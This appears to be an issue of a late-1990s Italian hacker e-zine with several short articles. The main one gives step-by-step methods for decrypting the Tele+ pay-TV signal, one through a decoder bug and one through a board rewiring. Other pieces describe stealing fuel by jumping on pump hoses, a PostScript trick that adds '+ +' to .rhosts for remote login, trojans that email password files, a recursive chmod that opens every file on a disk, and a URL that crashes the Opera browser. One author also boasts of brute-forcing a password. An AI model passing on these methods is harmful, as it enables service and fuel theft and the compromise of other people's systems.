ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
CONSUMO: un sorso di Johnny Walker e un decoder t+ stravolto dai miei inutili
sperimenti
MUSICA ASCOLTATA: Sigle dei cartoni animati rifatte da "Gli amici di Roland"
in versione Rockeggiante
Allora oggi mi sono alzato di buon umore, anche se fa un caldo boia e sto
schiattando dell'afa.
Ho deciso di scrivere questo articolo per mettere in chiaro quattro cosette
riguardo le radio-televisioni private codificate in particolare di t+.
Inizio col dire che non so se le cose che mi appresto a scrivere siano
legali o meno ma non penso che faccia molta differenza.
L'emittente telepiu' trasmette sia via satellite sia tramite il classico
decoder terrestre. In questo articolo approfondiro' le tecniche di
decriptaggio tramite decoder terrestre.
Pronti . .. . via!
T+ trasmette il proprio segnale (Audio e Video) tramite un sistema di
crittografia IRDETO che e' l'azienda che ha elaborato e introdotto i decoders
Comcrypt e Cablecrypt.
Tutte le info che troverete in questo articolo funziona non solo con t+ ma
anche con le altre emittenti (straniere) che utilizzano la stessa tecnologia.
Questo sistema di codifica di immagini e suoni nasce in due momenti separati:
per quanto riguarda l'audio il sistema di crittografia nasce nei primi anni
80 quando ancora non si utilizzava la crittografia per la televisione e
contemporaneamente alla nascita di Videocrypt e Eurocrypt.
Ma come funziona l'algoritmo di codifica Audio Video??
La questione, dal punto di vista teorico, non e' per niente difficile.
Innanzitutto una premessa rapida: la Tv di casa nostra, per ricevere e
visualizzare correttamente i segnali trasmessi hanno bisogno di essere
sincronizzati. Senza una sincronizzazione verticale e orizzontale i singoli
punti del fotogramma non troverebbero una posizione precisa e l'immagine
risulterebbe in continuo movimento per lo schermo. Una delle cose che fa
l'encoder (Non il decoder) e' questa: distorcere l'immagine. Altra cosa che
fa l'encoder e' quella di cambiare polarita' dell'immagine in ordine
pressoche' casuale (il colore bianco diventa nero e cosi' via . . .). La
funzione del decoder e' appunto sapere come le immagini sono distorte e
polarizzate in modo da saperle ricostruire rapidamente. Come dicevo prima
questo sistema di criptaggio del segnale video e' abbastanza vecchiotto ma
ancora largamente utilizzato. Tuttavia questo metodo e' totalmente insicuro
e cosi' decriptare il segnale video e' molto semplice. (non correte bei
fiuliti . . continuate a leggere . . ahahaeheheha)
Per quanto riguarda l'audio il discorso e' completamente diverso. Per le mie
conoscenze poco tecniche posso sicuramente dirvi che non esiste alcun modo
per ricevere l'audio modificando il proprio decoder terrestre. Si' puo'
utilizzare una scheda Tv conessa al picci' ma non conosco metodi di modifica
dei decoders. Per quanto riguarda le informazioni tecniche su tutti i tipi
di decoders e sugli algoritmi di criptaggio audio video vi rimando al sito
Republic che purtroppo non trovo piu' (cercate "Republic cablecrypt " e
troverete cio' che cercate. In questo sito c'e' una bellissima guida tecnica
(arrivata alla seconda edizione) che tratta in modo quasi scientifico la
tecnologia Irdeto.
E ORA . . . . . rulli di tamburo. . . .. . .
. . . . piu' forte . . . . . . .. . . .. . . .un po' meno . . . . . . . .
OK!
Come decriptare TeLePIU'
- - - - due metodi facili facili - - - Questi metodi sono tutti seri. Non sono semplci voci di corridio. Sta roba
funziona.
ATTENZIONE: esistono sicuramente metodi piu' scientifici per decriptare
telepiu' terrestre. Un anno fa circa ho conosciuto un tipo che
per L. 250.000 mi vendeva un kit (che ho visto funzionare) che
permetteva di decriptare telepiu'. Visto che i componenti erano
abbastanza economici e il lavoro era fattibilissimo ho deciso di
cercare ancora per Internet questi benedetti schemi ma non li ho
mai trovati.
( Chiunque voglia mettersi in contatto con me: [email protected] in chat
su #hackernow o #linux)
METODO 1) Questo metodo e' l'unico che io conosca che permette di vedere e
sentire tele+.
Funziona solo su modelli ComCrypt 4000 prima serie cioe' comprati fra il
dicembre '95 e il luglio '96. Molti di questi decoders sono poi stati
ritirati e revisionati . . . . (porca tr**a!)
Ecco la procedura:
- sintonizzate sul 1mo canale la frequenza di Telepiu' (se il decoder non e'
attivo apparira' E3o E0 )
- scollegate l'antenna
- premete il tasto - per tornare indietro con i canali ( apparira'
la scritta rr)
- ricollegate l'antenna
- godetevi il film o la partita Per cambiare da +1 a +2 va eseguita la
stessa procedura"
Questo funziona solo con alcuni decoder siglati ComCrypt 4000. Non pensate
di comprare un decoder apposta per provare: moltissimi decoder sono stati
ritirati e riprogrammati per correggere 'sto bug (ovviamente il mio e' uno
di quelli che non funziona). Almeno dieci persone mi hanno detto pero' che
funzioni (sul decoder giusto). Se avete un decoder in cantina a prendere
polvere potete sempre provare!
METODO 2) Questo metodo consiste nel fottere il segnale video criptato.
Conosco la procedura solo per i decoders CableCrypt. Non e' applicabile
(almeno: io non ci sono riuscito) sui decoder Comcrypt 4000 (sara' per
"par condicio"????)
Ecco come fare:
1. Smontate il decoder fino a quando riuscite ad estrarre il circuito
stampato del decoder. Ora localizzate sul decoder un integrato grosso
siglato delta 5.x (o comunque l'unico integrato a 40 pin presente nel
circuito)
Dalla parte delle saldature vi troverete qualcosa del genere:
40
21
--------------------------]
|
--------------------------1
20
- Localizza il pin 18 dell'integrato IC503 (o simile) e gratta via con un
taglierino o un coltello il rame della pista da entrambe le parti.
- Localizza il pin 23 dell'integrato IC503 (o simile) e gratta via il rame
sulla sinistra (questo dalla parte del microcontroller: insomma . . .
rigirate il tutto)
- Localizza il pin 32 e 33 e gratta via il rame da entrambi i lati.
- Localizza il pin 23 (si' quello di prima) e saldaci un filo, poi collegalo
al ground (puoi usare lo spazio vuoto del J835, guarda il lato componenti).
(traduzione del testo di Peter "The Video Ripper" disponibile sul sito di
Republic)
Non vorrei aver sbagliato
. . . ca**o!
Be' ecco la versione in lingua . .
- Be sure that all the metal tops are removed from the processor-box.
- Locate pin 18 of IC503 and scratch away the copper on both sides.
- Locate pin 23 of IC503 and scratch away the copper on the left,
this is the side of the micro-controller.
- Locate pins 32 and 33 and scratch away the copper at both.
- Locate pin 23 again and place a piece of solid core wire between pin 23
and ground (you can use the empty space of J835, see component side).
Io ho un ComCrypt 4000 e non ci sono riuscito . .
sigh sigh . . .
Comunque quelli di Republic mi sembrano tipi seri e disponibili. Provate su
un modello CableCrypt (dovrebbero essere i primi modelli usciti) e
probabilmente avrete piu' fortuna di me.
Ahhh! ho trovato un indirizzo! Dovrebbe essere l'home page di Peter
"The Video Ripper" ecco qua:
http://home.pi.net/~pluijer (non so se funziona ancora)
Be' l'articolo sta per finire. Chiunque voglia scrivermi la mia mailbox:
[email protected] Se qualcuno ha info serie sulla Tv via satellite
(non solo t+) e terrestre si faccia sentire!!
Tanti saluti e baci.
JohnnyRunner
"Il mio futuro e' nel passato e nel presente" Litfiba
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
BENZINA A GO G0!
oVvEro
devo fare benzina ma non ho soldi...
Se per caso dovesse capitarvi di trovarvi con la macchina o con la moto
senza benza e con poche migliaia di lire potete provare il seguente
"trucchetto" ai distributori automatici.
Dopo aver aperto il bocchetto della macchina (o moto) dove si inserisce la
benzina, prendete la pompa e tenendo premuta la leva per farla scorrere,
saltateci sopra ripetutamente ed energicamente. Con un po' di pazienza pian
piano farete benzina grazie alla pressione che si viene a creare saltando
sulla pompa (un mio amico, con una vecchia pompa, si è fatto il pieno di
benzina dello scooter in circa 15 minuti!!!).
Con i tipi di pompe che hanno il cassettino che raccoglie la benzina posto
sopra (come il disegno di seguito) sono quelle da cui si puo' attingere piu'
benzina dato che scende direttamente dall'alto.
.-------------.
[]]]]]]]]]]| lire 88888 |
[]
| litri 88888 |
[]
.----------.--|
[]
| |
[]
| |
[]
| |
[]
| |
||__
| |
||_'|
.------------.--|
||
/ |-| |-| |-|
|
()
| | | | | | |
|
()
| |_| |_| |_|
|
|
|
.----------------.
Occhio pero' a non farvi prendere per pazzi da chi passa dato che vi vedra'
saltare come dei dannati! ;-)
HarLoK
Spazio saluti: tutti quelli che mi conoscono, la mia compagnia nonche' quella
di sballo e i soliti Blinking, 3ph4Throx! Terror Keeper, Lord
Of Destruction, Dante Alighieri, Nobody88, la Spaghetti
Phreakers crew, Rigor Mortem, Devilnet, N0SF3RATU, CDP, Blum,
compresi tutti gli altri) K->
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³
BREVE E SEMPLICE LISTA DI ATTACCHI BASATI SU DATI
³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Ciao a tutti io mi kiamo KarmAYogA e, come avrete capito ho scelto questo
nick proprio xche' nella mia vita ogni cosa anke la piu' piccola cerco sempre
di farla al massimo delle possibilita' e non metto mai un limite al possibile
dato che come diceva qualcuno "Non credevo che era impossibile quando lo
feci!!!". Andro' a scrivere questo breve articolo che spero sia utile a piu'
gente possibile e se volete contattarmi scrivete a N0body88 che mi girera'
tutte le decine di mail che ricevero' =)
Questo tipo di attacchi, detta data driven, sono molto difficili da
individuare a causa delle loro modalita' ed i vari firewall servono a ben
poco contro questo tipo di attacchi. Faro' adesso una breve lista di esempi
x definire meglio questa modalita' x attaccare che si basa piu' sul social
engineering e sulla speranza che l'utente "bersagliato" sia ignorante, che
non sul fatto di usare strane o nuove tecniche x sperimentare l'effettiva
sicurezza di alcuni sistemi.
Esempio numero 1:
|__|> l'hacker / newbies si prepara un file pdf o postscript da usare x
eseguire cose non molto belle sul pc dei poveri utenti creduloni.
|__|> l'hacker / newbies manda una email ad un utente con, come attachment,
un file postscript che sembra essere normale ma che invece andra'
ad eseguire operazioni sui file senza che l'user se ne accorga.
|__|> l'user, ignaro di tutto, eseguira' subito il file postscript.
|__|> l'interprete postscript esegue le operazioni contenute nel file che
aggiungono la voce "+ +" nel file .rhosts dello user.
|__|> l'hacker / newbies esegue un rlogin sulla macchina dell'utente.
Esempio numero 2:
|__|> un utente scarica da un sito HTTP un file eseguibile.
|__|> l'utente esegue il file sul proprio pc.
|__|> il programma cancella tutti i file contenuti sulla macchina dell'utente
oppure compie solamente delle operazioni malicious e manda x esempio una
mail all'hacker/newbies contenente le password dell'ignaro utente.
|__|> il programma immette un virus all'interno della macchina dell'utente
se chi ha fatto il programma e' chi lo da in giro a questo scopo e' un
lamer e lamer rimarra' finche non cambia filosofia.
Esempio numero 3:
|__|> un utente scarica da un sito FTP un file eseguibile
|__|> l'utente esegue il file sul proprio pc.
|__|> il programma cancella tutti i file contenuti sulla macchina dell'utente
oppure compie solamente delle operazioni malicious e manda x esempio una
mail all'hacker/newbies contenente le password dell'ignaro utente.
|__|> il programma immette un virus all'interno della macchina dell'utente
se chi ha fatto il programma e' chi lo da in giro a questo scopo e' un
lamer e lamer rimarra' finche non cambia filosofia.
Esempio numero 4:
|__|> questa cosa si vede moooolto spesso... su IRC qualcuno dice ad uno nuovo
e un po' inesperto come ottenere un programma che: 1) lo aiutera' ad
usare meglio il sistema oppure 2) lo fara' diventare un hacker in pochi
secondi o 3) lo aiutera' a buttare giu0 chiunque in poki sec (tipo nuke)
|__|> l'utente quindi attirato dalla proposta fatt si fara' passare il
programma (con grn gioia del lamer) e lo eseguira'
|__|> il programma cancellera' tutti file dello user e inviera' per email una
copia del file delle password all'intruso (/etc/shadow o /etc/passwd)
oppure si installera' nel sistema sotto forma di sniffer, x raccogliere
password, sotto forma di trojan x aprire una porta, sotto forma di
Esempio numero 5:
|__|> in una pagina Web vi e' un bottone che dice "cliccare qui per infettare
una macchina" (esiste veramente!) Questo e' il piu' stupido ma quant'e'
vero iddio che esist ci posso mettere la mano sul fuoco xche' l'ho visto
io su geocities ma adesso non c'e' piu' dato che andando giu' di brute
force ho trovato la pass ho cancellato virus e pagine web e ho cambiato
la pass...ognuno aiuta gli altri a modo suo ;)
Byez Byex Byey
KarmA_YogA
"Cosa usi x hackare? io??? Uso la testa !!!!!!!!"
Webmaster e Sysadmin of www.nonvelodico.it
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
------------------------------------------------------------------MP3 in auto: Fantasie oltre la realta'
------------------------------------------------------------------INGREDIENTI: un pc 486 da rottame e una scheda audio 16 bitz
TEMPO PREVISTO: uggioso
Eila' . ..
tutto K?
In questo articolo vorrei parlare di mp3: come portarli comodamente (?) in
auto. Ormai tutti sanno che cosa sono gli Mp3, che software usare,
tricchetracche . . OK.
Frequentando un po' il newsgroup it.hobby.elettronica ho visto che
qualcuno ha gia' messo un Pc in auto (collegato all'autoradio) per
ascoltare Tanta musica ad alta qualita'.
L'URL di questo studente di elettronica e' __________________
(mi raccomando . . . e' da visitare).
In pratica in questo sito si vede il progetto di questo ragazzo (di cui
non ricordo il nome) che e' riuscito a a mettere un Pentium in auto
alimentandolo con un inverter 12/220. Per quanto riguarda i comandi e'
stata adattata una tastiera ricavata da un laptop che e' stata collocata
nelle vicinanze dello specchietto retrovisore. La sera stessa
in cui ho dato un'occhiata al suo sito ho dormito poco esaltato da questo
fantastico progetto.
Ho pensato che, tutto sommato, occorre spendere non pochi soldi.
Innanzitutto un Pc Pentium (anche 133, ma un pentium), poi un circuito
inverter per elevare la tensione da 12 V in continua a 220 V in alternata
necessaria al pc per funzionare correttamente.
In questo articolo mi piacerebbe "fantasticare" un po' su come risparmiare
un po' di soldi e avere ugualmente un buon impianto Mp3 in auto.
Ecco quanto.
LE TENSIONI
Facendo 4 conti un inverter costa + o - L. 180.000 (azzz. . ..) e , a mia
opinione, non e' molto conveniente. Certo che e' comodo, ma non costa
poco e non consuma poco.
Ecco lo schema delle tensioni
AUTO
12V ------------------>
CC
INVERTER
| PC
|scheda madre
=================
220V ------------------> | +5,-5,+12,-12 |
CA
======= CC ======
ALIMENTATORE sw
(CA= corrente alternata; CC=corrente continua)
In pratica, utilizzando un inverter, si passerebbe per i 220V
canonici senza trarne alcun profitto.
Se solo si riuscisse a ottenere i voltaggi appositi (+5,-5,+12,-12)
si potrebbe ottenere un risparmio notevole di spazio levando
l'alimentatore del PC. Inoltre il consumo di tutto l'impianto si
ridurrebbe drasticamente.
Per ottenere i voltaggi +5 e +12 non ci sono problemi, per quanto riguarda
il -5 non ci dovrebbero essere gravi problemi: ma per -12?????
(Ahhh!! Dimenticavo! +5,-5,+12,-12 V sono le tensioni necessarie alla
scheda madre per alimentare tutte le periferiche del PC)
Evitando di collegare le tensioni negative (-5 e -12 V) sicuramente il
computer dovrebbe essere in grado di fare il boot, visto che l'Hdd
utilizza solo la +12. Il problema + grande e' che la scheda audio non
funzionerebbe correttamente riproducendo un suono in mono oppure, nei casi
piu' cronici, non funzionando del tutto.
Un'altra cosa che mi incuriosisce riguardo l'inverter e' il consumo di
questo circuito.
Quando ho visto il progetto di ________ mi sono accorto che tutto
l'impianto MP3 era alloggiato in una Jeep (diesel) e quindi penso che lui
non abbia avuto particolari problemi di alimentazione. Ma ve l'immaginate
tutto quell'impianto sulla mia povera Uno 1000 ??? Secondo me dopo circa
40 secondi di utilizzo l'alternatore (sempre in funzione) si
riufiuterebbe di collaborare con la batteria visto il carico
Inverter+Alimentatore+Pc+Autoradio+Amplificatori !
Secondo me trovare una soluzione alternativa all'inverter sarebbe una gran
cosa. Purtroppo le mie poche e povere nozioni di elettronica non mi
permettono di far altro che aspettare qualche aiuto da Voi!
Ricordo comunque le tensioni necessarie per un corretto funzionamento:
+12,+5,-12,-5 V : chissa' se qualche lettore di newbies puo' darmi una mano!
(o un'idea)
Se solo si riuscisse a trovare questo aggeggino si potrebbe procedere
cosi': (questa e' quasi pura fantasia!)
contatti > __________________________________ <-- SchedaAudio/V
_______________| |_____________________________< ----- Scheda Madre
Si potrebbe sfilare la scheda audio dallo slot ISA e appoggiare la scheda
audio sulla scheda madre fissandola adeguatamente.
Saldando i contatti dello slot ISA ai contatti della scheda audio si
risparmierebbe un casino di spazio!!
Se la scheda madre ha l'audio integrato, ovviamente, tutto cio' non e'
necessario. Tuttavia la scheda video deve essere ugualmente connessa alla
MoBo poiche' il bios fa un Check prima di far partire il Pc. Quindi si
dovrebbe ripetere la stessa operazione anche per la scheda video perche'
altrimenti il Pc non partirebbe (sigh sigh). . . . . Qualche idea per
togliere la Scheda Video??? Booooooooooo
Vorrei provare questa "tecnica" dissacrando un vecchio 486 con 8
Mega di Ram senza CD e con un HD removibile da 2,1 Gb (il piatto forte
del PC!) : chissa' se ci riusciro'!
Be' questa era la parte piu' fantasiosa dell'articolo . . . ora la parte un
po' piu' seria.
CONFIGURAZIONE HARDWARE / SOFTWARE
Secondo la mia opinione spendere un sacco di soldi per un impianto in
macchina non vale la pena. Un buon vecchio 486 con 8 Mega di Ram potrebbe
essere un buon affare e funzionare egregiamente.
Come sistema operativo si potrebbe utilizzare mulinux (una mini
distribuzione di linux) installata su Hdd.
In alternativa si potrebbe ricompilare un kernel datato (sempre linux) che
comunque supporta una SB 100% compatibile. Il kernel un po' vecchiotto
garantirebbe il funzionamento dei programmi appositi senza la necessita'
di avere svariati mega di ram o un processore pentium.
Una configurazione ottimale del OS e' comunque essenziale per la buona
riuscita del progetto. Per il sw di utilizzo il grezzo mpg123 o il piu'
aggraziato (ma non troppo) freeamp potrebbero andare bene.
Da dimenticare (con questa configurazione) programmi + complessi come
x11amp o roba simile.
Se non siete pratici con linux si potrebbe ottenere lo stesso risultato
installando un Dos (meglio se FreeDos) e installare la versione apposita
di Winamp per questo sistema operativo (non l'ho ancora vista ma so che e'
in giro . . . probabilmente sul sito di Winamp (ma va??))
Be' per anche per questa volta e' tutto. Se ci sara' un seguito a
questo articolo e' perche' sono riuscito a fare qualcosa di pratico.
Ringrazio Sammy Power per la collaborazione pratica al progetto --- MP3
Fantasy ---.
Ogni e-mail in proposito e' gradita all'indirizzo [email protected]
In chat mi si trova verso le 19.00 o piu' tardi verso le 23.00
Ciao belli!
JohnnyRunner
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³
L'Uov0 De ColombO !
³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Beh...mini articolo per scrivere un piccolo trucchetto di cui
all'inizio pochi conoscono l'esistenza....
deD to: Poll!...alle mie spalle che mi corregge l'articolo in realtime
Vs-DeD to:Il treno che alle 16:00 parte...che balle !
Bene...avete un'account su di una freeshell...volete uploadarci
un azzo di file ma l'ftp non c'Š...come fare ???
Aprite il file con il sorgente del file che volete uplodare
con il normale notepad selezionate tutto il testo ed ora clickate
col destro e scegliete copia.
Entrate nella vostra shell, editate un nuovo file con o un qualsiasi
altro editor di testo ed incollate il tutto...salvate il file con
estensione .c chiudete e poi con gcc o cc o che caxxo volete
compilatelo.... ( gcc -o cax.c cax ) ed avrete l'eseguibile
di cax....'na stronzata....bye byeeeeee.....D4NT3 4L|GH|3R| !!!!!
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³
QUALKE TRUCCO BY PIPPO CALO'
³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
1) MINI GUIDA A COME SPROTEGGERE TUTTO IL DISCO E FARE INCAZZARE IL ROOT ;)
Questo per sproteggere tutto da tutti da questa directory giu' sotto per
tutto l'albero (cioe' tutti i file e le dir degli *nix NOTA BY N0bodY88):
chmod -R a+rwx *
cd / && chmod -R a+rwx *
Anke con questo comando infatti (sono equivalenti) si puo' sproteggere tutto
il disco (ma solo se si e' root!!!)
2) MINI GUIDA A && E ||
COMANDOA && COMANDOB --> esegue il comando B solo se e' riuscito ad eseguire
il comando A
COMANDOA || COMANDOB --> esegue il comando B solo se NON e' riuscito ad
eseguire il comando A
3) MINI GUIDA CON PRECISAZIONI SUI FILE .RHOSTS
Il file .rhosts deve essere protetto PERLOMENO da scrittura contro g e o.
Altrimenti non funziona l'entrata in remote.
Temo anche che debba essere protetto da lettura.
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³
UN PO' TRUCCHI CAZZATE E STRONZATE
³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Ciao a tutti questo e' il vs N0bodY88 che vi parla dal suo portatile datogli
in dotazione da una ditta che evidentemente se ne intende di pazzi hihihi.
In queste poche righe vi daro' alcuni consigli non difficili e di sicuro non
inediti ma che forse possono risultare utili. Eccoveli divisi in punti:
1) Immaginate di aver trovato posto in un azienda dove avete la vostra
scrivania e il vostro telefono personale ma che si collega ad un centralino:
ebbene come fare x connettersi ad internet? Per "scavalcare" (diciamo) il
centralino basta far precedere il numero telefonico del vs provider nella
vostra connessione di acceso remoto uno zero con due virgole. Esempio:
--> connessione da casa --> 06880000
--> connessione dall'ufficio --> 0,,0688000
Semplice no ;)
2) come collegare 2 computer che non hanno schede di rete? Allora la soluzione
e' semplice basta munirsi di un semplice cavetto uplink che andra' a
connettere i due pc ( ovviamente =) ) sulla porta com1 o, tramite adattatore,
alla com2 dopodiche' bastera' mandare in esecuzione su entrambi i pc collegati
un programmino che si chiama LL3 e che potete trovare allegato al cavo seriale
o che potete cmq procurarvi facilmente o sulla rete o mediante qualke amico
smnanettone che abbia anke un minimo interesse sulle reti. Nel programma
sopracitato LL3 basta:
--> premere L e poi premere invio x muoversi dentro e fuori le varie dir
--> premere C e poi premere invio x copiare file da un pc all'altro
--> premere E e poi premere invio x cancellare dei file
CONSIGLIO: se uno dei due pc e' un 486 e' consigliabile copiare un file alla
volta...lo so...e' un po' na menata pero' cosi' non si impalla a
causa della differenza di velocita' dei due pc... ;)
3) cosa fare nei momenti di noia in rete quando gli amici non ci sono e di
hackare non c'avete la testa? Semplicemente passarsi sotto teleport i vari
www.softpj.com e www.spippolatori.com senza lasciare neanche una immagine
che poi se se ne accorgono vi fanno a fette hihihi e ricodate che noi
impariamo x creare e non per rompere o cancellare.
4) ATTENZIONE !!! Se girate su irc state attenti che c'e' un buontempone che
va in giro e domanda "vuoi vedere un mio video" il che non sarebbe rompiballe
senonche' il video mandato da questo fantomatico simpaticone si rivela essere
un file chiamato patch.exe che potete immaginare cos'e'...cmq il consiglio e'
il solito okkio a non aprire niente che derivi da sconosciuti e okkio ai "re
degli hacker" come questo =)
tnx speciale a dante x la segnalazione di questo "pericolo pubblico" hihihi
5) Cosa e' un array ? So che e' una cazzata ma dato che ultimamente me l'hanno
gia' chiesto in tre o quattro e quindi... Gli array sono strumenti utilizzati
x memorizzare gruppi di elementi in una singola unita'. Gli array quindi
sono in pratica degli insiemi di elementi aventi una comune caratteristica.
Immaginate di fare un programma nel vostro linguaggio di programmazione
preferito e di dover immettere in un database decine se non centinaia di dati
dello stesso tipo (variabili numeriche, variabili di testo etc.)...cosa
fate? Fate decine di dichiarazioni oppure (e qui vengono in aiuto gli array)
create con una unica dichiarazione un insieme di dati che contiene tutti i vs
dati in un unico array :)
6) Non dormite la notte all'incubo che qualcuno vi incul... vi invada l'orifice
con qualke trojan o che vi entri nel vs win preferito e che vi formatti tutto?
Niente paura c'e' un trucco semplicissimo x evitare questo e x dormire sonni
tranquilli... tutto questo puo' essere infatti evitato con un passo
semplicissimo ma anke un po' ingegnoso (e che, ci tengo a precisarlo, non lo
ho inventato io e credo lo sappiano gia' in tanti). Basta infatti andare nella
nostra cartella c:\windows\command e rinominare il ns buon vecchio format.com
in formatt.com o cax.com o quellochevolete.com...sta a voi decidere e buone
nottate ;)
PS: si ringrazia Yago - Eugenio per avermi arrichito la conoscenza con questo
trucchetto semplice (se non lo sai ;) ma moooooooooolto efficace.
7) Ed ora un piccolo trcchetto x quelli che creano e programmano in java e
hanno appena cominciato e stanno usando un compilatore sotto dos. Il trucco
consiste nel mettere le seguenti linee in un file e chiamarlo a.bat dopodiche'
basta che quando volete provare un progetto appena finito basta che digitiate
il comando "a nomemioprogetto" e uala'! ci siamo risparmiati un bel po' di
------inizio copiaincolla-------------------@echo off
cls
path c:\jbuilder\java\bin
c:\jbuilder\java\bin\javac.exe %1.java
c:\jbuilder\java\bin\appletviewer.exe %1.html
------fine copiaincolla---------------------!!!!!!ATTENZIONE IL PROSSIMO TRUCCO NON E' MIO MA E' UNA TRADUZIONE!!!!!!
8) Come mandare in crash il "famoso" browser web Opera? Ebbene basta
una piccola cosa x far andare in crash sudetto programma e consiste
nell'aggiungere un ulteriore slash a un qualsiasi indirizzo web.
Piccolo esempio: http:///
PS: non so pero' se nelle ultime versioni ci sia ancora questo bug
quindi che mi resta da dire oltre al fatto che l'autore del testo
che ho tradotto non e' riportato nel testo stesso? Ah si'...
...tentar non nuoce...e com dice un amico di un mio amico mooolto
maschilista (ma dire mooooolto e' dire poco) dice sempre "Tu vai
dalla ragazza lo tiri fuori dalle mutande e glielo metti in mano...
tanto qualsiasi cosa succeda non cade ;)
E anche questo numero il mio art su cazzate trucchi e stronzate e' finito...
...quindi..
...byez a tutti dal vostro redivivo N0bodY88
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
